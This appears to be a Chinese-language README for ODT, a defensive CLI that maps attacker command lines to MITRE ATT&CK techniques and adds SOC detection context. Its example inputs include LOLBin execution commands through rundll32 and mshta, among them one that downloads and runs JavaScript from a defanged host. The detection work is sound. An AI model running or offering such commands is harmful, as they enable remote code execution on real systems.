alisonstark/OD-translator

# ODT - 攻防翻译器 ## 📋 目录 - [概述](#overview) - [问题陈述](#problem-statement) - [功能](#features) - [要求](#requirements) - [安装说明](#installation) - [项目结构](#project-structure) - [用法](#usage) - [示例](#examples) - [架构](#architecture) - [测试](#testing) - [使用场景](#use-cases) - [设计原则](#design-principles) - [路线图](#roadmap) - [文档](#documentation) - [项目状态](#project-status) - [免责声明](#disclaimer) ## 🎯 概述 **Offensive–Defensive Translator (ODT)** 是一个网络安全分析与增强引擎，旨在系统地将攻击性技术转换为可操作的防御性情报。其主要目标是弥合攻击者操作方式（红队/对手视角）与防御者检测、调查和响应威胁方式（蓝队/SOC 视角）之间的认知和操作差距。 ODT 专为 **SOC 分析师**、**检测工程师**、**威胁猎手**以及任何处理**攻击性安全工件**的人员设计。 该项目不仅将攻击性命令或技术视为孤立的指标，还将其置于以下背景下进行 contextualizes： - 🎯 **MITRE ATT&CK 框架** - 📊 相关**遥测源**（端点、网络、日志） - 🛡️ **防御性检测和响应考量** 输出为结构化、机器可读的格式，适用于检测工程、警报分类、威胁猎杀和教育场景。 ## 🔍 问题陈述 网络安全领域的攻击性知识非常丰富：博客、概念验证、红队报告、恶意软件分析和漏洞利用文章。然而，这些信息通常是： - 📝 非结构化的 - ⚔️ 以攻击者为中心的 - 🔌 与 SOC 团队实际监控和防御环境的方式脱节 相反，防御者通常处理警报、日志和检测，却并不完全理解其背后的原始攻击者意图或技术。 **Offensive–Defensive Translator** 通过提供一种确定性的方法，将攻击性工件转换为以防御者为中心的情报，从而解决这一不匹配问题。 ## ✨ 功能 - 🔎 **攻击性工件摄取** 分析来自各种来源的命令、LOLBins 使用和执行模式 - 🧹 **标准化与意图分析** 对原始命令进行分词、清理并提取攻击者意图 - 🎯 **MITRE ATT&CK 映射** 自动映射到 MITRE ATT&CK 战术和技术 (T1059, T1218, T1027, T1105, T1071) - 🔓 **混淆解码** 自动解码 PowerShell base64、JavaScript atob/fromCharCode 和 URL 编码 - 📈 **置信度评分** 基于证据的评分，从基线先验 (0.5) 开始，根据指标多样性和匹配质量进行调整 - 🛡️ **防御性增强** 全面的防御上下文，包括： - 检测机会 - 相关遥测源 - SOC 分析师调查笔记 - 防御性解释 - 📁 **结构化 JSON 输出** 适用于自动化、SIEM 集成和分析工作流的机器可读格式 - 🧪 **全面测试** 144 个测试（117 个单元测试 + 27 个集成/良性测试），覆盖标准化、置信度评分、检测、解码、批处理、HTML 报告和现实攻击链（100% 通过率） **当前覆盖的技术（默认全部启用）：** - T1059 (命令和脚本解释器) - T1218 (系统二进制代理执行) - T1027 (混淆文件或信息) - T1105 (入口工具传输) - T1071 (应用层协议) - T1543 (创建或修改系统进程) - T1055 (进程注入) ## ⚙️ 要求 - **Python**: 3.8+ - **依赖项**: 列于 [requirements.txt](requirements.txt) ## 🧰 安装说明 ### 前置条件 确保已安装 Python 3.8+。在 Windows 上： ``` python --version # Should be 3.8 or higher ``` 在 Linux (Ubuntu/Debian) 上： ``` sudo apt install python3 python3-pip python3-venv ``` ### 设置 1. **克隆仓库**： ``` git clone cd OD-translator ``` 2. **创建虚拟环境**（推荐）： ``` python -m venv venv venv\Scripts\activate # On Windows source venv/bin/activate # On Linux/macOS ``` 3. **安装依赖项**： ``` pip install -r requirements.txt ``` 4. **以开发模式安装**（推荐用于 CLI 使用）： ``` pip install -e . ``` 安装后，直接使用 CLI： ``` odt --help ``` 如果 Windows 在首次运行时阻止生成的启动器： ``` Unblock-File .venv\Scripts\odt.exe ``` 要以不可编辑/系统样式为当前环境安装 `odt`： ``` pip install . ``` ## 📁 项目结构 ``` OD-translator/ ├── README.md # This file ├── TODO.md # Development tasks and roadmap ├── requirements.txt # Python dependencies ├── LICENSE # Project license │ ├── src/ # Main application directory │ ├── __init__.py │ │ │ ├── cli/ # Command-line interface │ │ ├── __init__.py │ │ └── main.py # CLI entry point │ │ │ ├── core/ # Core analysis engine │ │ ├── __init__.py │ │ ├── decoder.py # Obfuscation decoder │ │ ├── detector.py # Technique detection │ │ ├── mitre.py # MITRE ATT&CK integration │ │ ├── output.py # Output formatting │ │ ├── parser.py # Command parsing & normalization │ │ └── pipeline.py # Analysis pipeline orchestration │ │ │ └── detection/ # Detection rules & metadata │ ├── __init__.py │ ├── metadata.py # Technique metadata │ └── technique_pattern_db.py # Detection pattern database │ ├── data/ # Data storage │ ├── batch_commands/ # Batch command examples │ │ ├── batch_commands_example.csv # CSV format examples │ │ ├── batch_commands_example.json # JSON format examples │ │ └── batch_commands_example.txt # Text format examples │ ├── mitre/ # MITRE ATT&CK cache │ │ └── attackcti_t1059.json # Cached technique data │ └── results/ # Analysis output files │ └── analysis_YYYYMMDD_HHMMSS.json │ ├── tests/ # Unit test suite │ ├── __init__.py │ ├── README.md # Testing documentation │ ├── test_parser.py # Normalization tests (10 tests) │ ├── test_detector.py # Detection tests (62 tests) │ ├── test_decoder.py # Decoding tests (25 tests) │ ├── test_batch_processor.py # Batch processing tests (5 tests) │ ├── test_cli.py # CLI integration tests (3 tests) │ ├── test_report_generator.py # HTML report generation tests (12 tests) │ ├── test_realistic_commands.py # Realistic command integration test (1 test) │ └── test_benign_commands.py # Benign false-positive baseline tests (26 tests) │ ├── scripts/ # Utility scripts │ ├── build_mitre_db.py # MITRE data fetcher │ └── validate_output.py # Output validation │ └── docs/ # Additional documentation ├── changes_summary.md # Changelog and version history ├── cyber_kill_chain_mapping.md # Kill chain stages analysis └── function_flow.mmd # Function flow visualization ``` ## 🔧 用法 使用已安装的 `odt` 命令直接运行 CLI。 后备方案（未安装）：`python src/cli/main.py`。 ### 快速帮助 查看所有可用选项和标志： ``` python src/cli/main.py --help # 或 python src/cli/main.py -h # 已安装的 CLI 命令 odt --help ``` ### 基本分析 分析单个命令： ``` python src/cli/main.py "rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication\"" # 已安装的 CLI 命令 odt "rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication\"" ``` ### 将输出保存到文件 使用 `-o` 或 `--output` 标志保存结果并自动添加时间戳： ``` python src/cli/main.py -o results.json "mshta.exe javascript:var s=new ActiveXObject('WScript.Shell');s.Run('cmd.exe /c whoami',0)" # 已安装的 CLI 命令 odt -o results.json "mshta.exe javascript:var s=new ActiveXObject('WScript.Shell');s.Run('cmd.exe /c whoami',0)" ``` 输出保存至：`data/results/results_YYYYMMDD_HHMMSS.json` ### 解码混淆命令 使用 `-d` 或 `--decode` 标志在分析前自动解码： ``` # PowerShell base64 python src/cli/main.py -d "powershell -encodedCommand RwBlAHQALQBQAHIAbwBjAGUAcwBzAA==" # JavaScript atob python src/cli/main.py --decode "mshta javascript:eval(atob('dGVzdA=='))" # 已安装的 CLI 命令 odt --decode "mshta javascript:eval(atob('dGVzdA=='))" ``` **支持的编码：** - PowerShell base64 (`-encodedCommand`, `-enc`, `-e`) - JavaScript atob/fromCharCode - URL 编码 ### 技术检测行为 默认情况下，会对每个命令评估所有支持的技术。 ### 从 Stdin 分析 ``` echo 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication"' | python src/cli/main.py # 已安装的 CLI 命令 echo 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication"' | odt ``` ### 批处理 从单个文件处理多个命令并生成一个聚合的 JSON 输出。 支持的输入格式： - `.txt`：每行一个命令 - `.csv`：第一列或 `command` 列 - `.json`：字符串数组或包含 `command` 的对象数组 ``` odt --batch-input commands.txt odt --batch-input commands.csv --batch-output triage_batch.json odt --batch-input commands.json --batch-verbose ``` 可直接运行的示例（位于 `data/batch_commands/`）： ``` odt --batch-input data/batch_commands/batch_commands_example.txt --batch-output batch_from_txt.json odt --batch-input data/batch_commands/batch_commands_example.csv --batch-output batch_from_csv.json odt --batch-input data/batch_commands/batch_commands_example.json --batch-output batch_from_json.json ``` 批处理输出保存至 `data/results/` 并包含： - `batch_metadata`（计数、时间戳、持续时间） - `results`（每个命令的分析输出） - `error_details`（任何命令级别的失败） ### HTML 报告生成 为单个命令或批处理分析生成专业的 HTML 报告，包含可视化、时间线和杀伤链映射。 ``` # 单命令 HTML 报告 odt --generate-report "cmd.exe /c dir" # 批量分析 HTML 报告 odt --batch-input commands.txt --generate-report # 自定义报告输出路径 odt --generate-report --report-output my_analysis.html "powershell.exe Get-Process" ``` 报告默认保存至 `data/reports/` 并包含： **单命令报告：** - 分析的命令和标准化形式 - 检测到的 MITRE ATT&CK 技术 - 杀伤链阶段可视化 - 可展开的技术详情（模式、证据、类别） - 暗色主题的专业样式 **批处理分析报告：** - 批处理摘要（总数、已处理、错误、持续时间） - 带风险指标的时间线 - 跨所有命令的杀伤链进展 - 聚合技术覆盖表 - 每个命令的详细分析 - 错误跟踪和诊断 示例： ``` odt --batch-input data/batch_commands/batch_commands_example.json --generate-report # 创建：data/reports/batch_20260304_212915.html ``` ### PowerShell 引号技巧 PowerShell 会在 CLI 看到引号和括号之前解析它们。使用以下模式之一： **Here-string（推荐）：** ``` @' mshta.exe "javascript:var p='po'+'wer'+'shell';var w=new ActiveXObject('WScript.Shell');w.Run(p+' -c echo test',0)" '@ | python src/cli/main.py ``` **使用 `--%` 停止解析：** ``` python --% src/cli/main.py mshta.exe "javascript:var p='po'+'wer'+'shell';var w=new ActiveXObject('WScript.Shell');w.Run(p+' -c echo test',0)" ``` ### 刷新 MITRE 缓存 强制刷新本地 MITRE ATT&CK 缓存： ``` python src/cli/main.py "whoami" --refresh-mitre # 已安装的 CLI 命令 odt "whoami" --refresh-mitre ``` ### 同步官方 MITRE 技术文档（离线） 将权威的 MITRE ATT&CK 技术页面下载到 `data/mitre_docs/`，包括原始 HTML 和生成的 Markdown： ``` python scripts/sync_mitre_docs.py --all-from-rules --format both ``` 这将生成： - `data/mitre_docs/html/.html` - `data/mitre_docs/markdown/.md` - `data/mitre_docs/manifest.json` ### VS Code 调试 使用此启动配置（`.vscode/launch.json`）： ``` { "name": "ODT CLI (args)", "type": "debugpy", "request": "launch", "program": "${workspaceFolder}/src/cli/main.py", "console": "integratedTerminal", "redirectOutput": true, "args": [ "mshta.exe \"javascript:var r=new ActiveXObject('MSXML2.XMLHTTP');r.open('GET','https://static-example[.]net/assets/app.js',0);r.send();if(r.status==200){new Function(r.responseText)();}\"" ] } ``` ## 💡 示例 ### 示例 1：LOLBin 代理执行 **输入：** ``` rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication" ``` **输出（简化）：** ``` { "input_command": "rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication\"", "mitre_mapping": { "tactic": "Defense Evasion", "technique": "Signed Binary Proxy Execution", "technique_id": "T1218" }, "analysis": { "attacker_intent": "Execute malicious code via a trusted Windows binary", "execution_context": "LOLBins abuse" }, "defensive_enrichment": { "telemetry_sources": [ "Sysmon Event ID 1 (Process Creation)", "Windows Event ID 4688 (Process Creation)" ], "detection_opportunities": [ "Suspicious rundll32 command-line patterns", "Abnormal parent-child process relationships", "Rundll32 executing with javascript: protocol handler" ], "soc_notes": "Commonly used for fileless execution and phishing payloads" }, "confidence": 0.78 } ``` ### 示例 2：混淆的 PowerShell **输入：** ``` python src/cli/main.py -d "powershell -encodedCommand RwBlAHQALQBQAHIAbwBjAGUAcwBzAA==" ``` **解码后的命令：** ``` Get-Process ``` **输出包括：** - 解码后的命令文本 - T1059.001 (PowerShell) 检测 - 混淆指标 (T1027) - 针对 base64 编码命令的防御性上下文 ### 置信度评分说明 `confidence` 值 (0.0–1.0) 基于以下因素反映检测确定性： - **基线先验**：起始值为 0.5 - **证据多样性**：匹配指标的数量和种类 - **指标质量**：通用匹配 vs 特定匹配 - **行为信号**：命令链式调用、下载模式、可疑参数 - **惩罚**：过度依赖通用 token **示例评分：** - `0.9–1.0`：高置信度（多个特定指标） - `0.6–0.8`：中等置信度（部分特定 + 通用指标） - `0.3–0.5`：低置信度（主要是通用指标） ## 🏗️ 架构 项目遵循**分层架构**，以确保清晰性、可扩展性和关注点分离。 ``` ┌─────────────────────────────────────────────────┐ │ Input Layer │ │ Offensive Artifact (command/technique) │ └─────────────────┬───────────────────────────────┘ ↓ ┌─────────────────────────────────────────────────┐ │ Parsing & Normalization Layer │ │ • Tokenization │ │ • Cleanup & whitespace normalization │ │ • Intent extraction │ │ • Obfuscation decoding (if enabled) │ └─────────────────┬───────────────────────────────┘ ↓ ┌─────────────────────────────────────────────────┐ │ Analysis & Mapping Layer │ │ • Technique detection (pattern matching) │ │ • MITRE ATT&CK tactic & technique mapping │ │ • Evidence extraction │ │ • Confidence scoring │ └─────────────────┬───────────────────────────────┘ ↓ ┌─────────────────────────────────────────────────┐ │ Defensive Enrichment Layer │ │ • Detection logic explanations │ │ • Telemetry source identification │ │ • SOC investigation context │ │ • Defensive recommendations │ └─────────────────┬───────────────────────────────┘ ↓ ┌─────────────────────────────────────────────────┐ │ Output Layer │ │ Structured JSON (exportable, automatable) │ └─────────────────────────────────────────────────┘ ``` ### 层详情 #### 📥 输入层 - 通过 CLI 参数、stdin 或文件输入接受命令 - 处理具有复杂引号的多部分命令 #### 🧹 解析与标准化层 ([parser.py](src/core/parser.py)) - 标准化空格和命令结构 - 对命令组件进行分词 - 提取执行意图 - 解码混淆（PowerShell、JavaScript、URL 编码） #### 🔍 分析与映射层 ([detector.py](src/core/detector.py)) - 基于模式的技术检测 - 通过 [mitre.py](src/core/mitre.py) 映射到 MITRE ATT&CK 框架 - 基于证据的置信度评分 - 支持 T1059、T1218、T1027、T1105、T1071 技术 #### 🛡️ 防御性增强层 ([metadata.py](src/detection/metadata.py)) **这是 ODT 的核心差异化优势。** 回答关键问题： - *攻击者试图达成什么目标？* - *此活动如何在日志或遥测中体现？* - *哪些数据源与检测最相关？* - *SOC 分析师在调查期间应关注什么？* 将原始攻击者行为转换为面向防御者的情报。 #### 📤 输出层 ([output.py](src/core/output.py)) - 结构化 JSON 格式 - 带时间戳的文件输出至 `data/results/` - 适用于自动化和 SIEM 集成的机器可读格式 ### 流水线编排 [pipeline.py](src/core/pipeline.py) 模块协调所有层，确保： - **解耦**：每一层独立运作 - **可扩展性**：易于添加新技术和增强功能 - **可测试性**：无副作用的纯函数 - **可组合性**：函数返回结构化数据以供链接 ## 🧪 测试 ### 安装测试依赖项 ``` pip install -r requirements.txt ``` ### 运行针对性测试 ``` # 测试特定技术 pytest tests/test_detector.py -k "t1105 or t1071" # 测试特定函数 pytest tests/test_detector.py -k "confidence" # 详细输出 pytest tests/ -v ``` ### 运行单元测试 项目包含全面的单元测试，涵盖： - **📏 命令标准化** (10 个测试)：空格处理、边界情况、特殊字符 - **📊 置信度评分** (14 个测试)：基于证据的评分、奖励、惩罚、边界情况 - **🎯 技术检测** (48 个测试)：T1059、T1218、T1027、T1105、T1071、T1543、T1055 检测及证据提取 - **🔓 混淆解码** (25 个测试)：PowerShell base64、JavaScript atob/fromCharCode、URL 编码 - **📦 批处理** (8 个测试)：CLI 批处理标志、CSV/JSON/TXT 解析、聚合输出验证 - **🔗 集成测试** (1 个测试)：现实攻击链，100% 检测准确率 - **✓ 良性命令测试** (26 个测试)：针对合法命令的误报基线 **总计：144 个测试（100% 通过率）** ### 良性命令误报测试 检测质量的一个关键组成部分是**在不牺牲恶意软件检测的前提下最大限度地减少误报**。 **目的：** 此测试套件针对**合法的、非恶意命令**验证检测引擎，这些命令出现在正常的 Windows/Linux 系统管理和自动化工作流中。它建立了基线误报并识别需要改进的模式。 **测试内容：** - Windows 系统管理（Windows 更新、磁盘检查、服务列表、计划任务） - 合法网络操作（DNS 查询、本地健康检查、监控） - DevOps 与自动化脚本（Docker、Git、npm、pip、Python 包） - 合法脚本操作（基本 VBScript、PowerShell 模块、批处理脚本） - 日志与监控（日志解析、文件 tail、事件日志查询） - 文件操作与备份（robocopy、压缩归档、文件复制） **预期结果：** - 大多数良性命令**不应触发检测** - 触发检测的命令应具有**低置信度** (<0.5) 或被解释为可接受的权衡 - 良性命令上的**高置信度检测** (>0.8) 表示需要改进的模式 - 中等+ 置信度检测的误报率应 <20% **权衡理念：** 为了保持恶意软件检测灵敏度，一些误报是可以接受的： - 对 `powershell -NoProfile` 的 0.45 置信度检测是可接受的噪音 - 对合法活动的 0.85 置信度检测值得调查，即使很少见 - 分析师使用置信度分数来确定调查优先级并过滤噪音 **为何重要：** - **分析师信任**：减少警报疲劳并建立对工具的信心 - **运营效率**：分析师将时间花在高信号检测上，而非误报 - **反馈循环**：记录哪些模式过于敏感并需要调整 - **防御成熟度**：反映现实世界的 SOC 工作流，其中真阳性比原始检测计数更重要 **运行良性命令测试：** ``` # 运行所有良性命令测试 pytest tests/test_benign_commands.py -v # 运行并包含详细的误报分析 pytest tests/test_benign_commands.py::test_benign_commands_false_positive_rate -v -s ``` **理解误报：** 当良性命令触发检测时，检查： 1. **置信度分数**：是可接受的噪音 (<0.5) 还是需要改进的模式？ 2. **技术**：哪个 MITRE 技术被触发？是否值得承受该误报率？ 3. **证据**：匹配了哪些指标？是否过于通用？ 4. **上下文**：在真实的 SOC 中，分析师会关心来自合法系统的此检测吗？ ### 运行所有测试 ``` pytest tests/ -v ``` ### 预期输出 ``` ============================= test session starts ============================= platform win32 -- Python 3.11.9, pytest-9.0.2, pluggy-1.6.0 collected 112 items tests/test_benign_commands.py::test_benign_windows_update_check PASSED tests/test_benign_commands.py::test_benign_get_process PASSED ... tests/test_decoder.py::test_detect_encoding_powershell_base64 PASSED ... tests/test_detector.py::test_score_confidence_zero_evidence PASSED tests/test_detector.py::test_detect_t1059_mshta_javascript PASSED tests/test_detector.py::test_detect_t1105_curl_download_output PASSED tests/test_detector.py::test_detect_t1071_http_url_in_command PASSED ... tests/test_parser.py::test_normalize_basic_whitespace PASSED tests/test_realistic_commands.py::test_realistic_commands PASSED ============================= 112 passed in 0.26s ============================== ``` ### 测试详情 每个测试通过以下方式独立验证检测功能： - 创建模拟输入数据 - 调用分析函数 - 对返回的数据结构进行断言 - 验证置信度分数和证据提取 **无副作用，无文件 I/O，纯业务逻辑测试。** 有关详细的测试文档，请参阅 [tests/README.md](tests/README.md)。 ## 🎯 使用场景 - **👩‍💻 SOC 分析师** 通过理解攻击者意图和相关遥测，改进警报分类和调查上下文 - **🔍 检测工程师** 设计基于攻击者行为的检测，并清晰映射到可观察信号 - **🎯 威胁猎手** 从已知技术转向可观察信号和遥测源 - **🎓 学生和学习者** 了解红队行动如何转化为蓝队可见性和防御操作 ## 👨‍💻 设计原则 - **🛡️ 防御者优先的心态** 输出针对蓝队使用和 SOC 工作流进行了优化 - **📊 结构化优于叙述** 机器可读格式优于散文，以利于自动化和集成 - **🔧 可扩展性** 可以增量添加新技术、输入和增强功能 - **✨ 清晰度优于完整性** 专注于可解释、实用的情报，而非详尽的覆盖 ## 🛣️ 路线图 ### 第一阶段 — 核心翻译器 ✅ (已完成) - ✅ 基于命令的输入支持 - ✅ MITRE ATT&CK 映射 (T1059, T1218, T1027, T1105, T1071) - ✅ JSON 输出模式 - ✅ 防御性增强逻辑 - ✅ 混淆解码 - ✅ 置信度评分 - ✅ 误报基线测试 ### 第二阶段 — 面向检测的扩展 🔄 (当前) - ✅ 预定义检测模式库（7 种技术，180+ 模式） - ✅ 映射到常见 EDR/SIEM 遥测（Sysmon、PowerShell、WMI 等） - ✅ 其他 MITRE 技术 (T1543, T1055) - 🔄 改进进程关系分析 - 🔄 针对持久化和注入技术的高级检测模式 ### 第三阶段 — 高级增强 - 💭 多命令之间的关联 - 💭 技术链式调用（攻击路径） - 💭 使用 ML 模型增强置信度评分 - 💭 上下文感知的威胁情报集成 ### 第四阶段 — 生态系统集成 (未来) - 🔮 SIEM 规则的导出格式 (Splunk、Elastic、Sentinel) - 🔮 类 Sigma 的检测模板 - 🔮 与威胁情报源集成 (MISP、OpenCTI) - 🔮 实时命令分析 API **图例**: ✅ 已完成 | 🔄 进行中 | 💭 计划中 | 🔮 未来 ## 📚 文档 - **[tests/README.md](tests/README.md)** - 详细的测试指南和测试结构 - **[docs/changes_summary.md](docs/changes_summary.md)** - 详细的变更日志和版本历史 - **[docs/cyber_kill_chain_mapping.md](docs/cyber_kill_chain_mapping.md)** - 网络杀伤链分析：技术如何映射到攻击阶段 - **[docs/function_flow.mmd](docs/function_flow.mmd)** - 函数流程的 Mermaid 图 - **[sample_commands.md](sample_commands.md)** - 用于测试的示例攻击性命令 - **[data/mitre_docs/README.md](data/mitre_docs/README.md)** - 离线 MITRE ATT&CK 文档同步工作流 ## 🚧 项目状态 本项目处于**积极开发中**，旨在随着作者专注于以下领域而不断演进： - SOC 运营 - 检测工程 - 蓝队工作流 - 威胁猎杀方法论 **欢迎贡献、想法和批评性反馈！** ## ⚠️ 免责声明 本项目严格用于**防御、教育和研究目的**。 **ODT 不：** - 启用或促进恶意活动 - 提供漏洞利用工具或武器化载荷 - 鼓励未经授权的系统访问 **ODT 旨在：** - ✅ 改善防御性安全运营 - ✅ 教育安全专业人员了解攻击者技术 - ✅ 支持检测工程和威胁猎杀 - ✅ 弥合攻击性与防御性网络安全之间的差距 请负责任且合乎道德地使用。 ## 📄 许可证 详情请参阅 [LICENSE](LICENSE) 文件。 ## 🙏 致谢 - **MITRE ATT&CK** - 提供全面的对手战术和技术框架 - **安全研究社区** - 分享为防御实践提供信息的攻击性技术

**由防御者 🛡️ 为防御者构建**

标签：CISA项目, Cloudflare, CSV导出, DNS 解析, Homebrew安装, IP 地址批量处理, MITRE ATT&CK, Web报告查看器, 后端开发, 后端开发, 命令分析, 子域名变形, 子域枚举, 安全运营, 情报转换, 扫描框架, 攻击技战术, 攻击模拟, 数据展示, 文档结构分析, 紫队, 红队, 网络安全, 网络调试, 自动化, 逆向工具, 遥测数据, 防御策略, 隐私保护, 驱动签名利用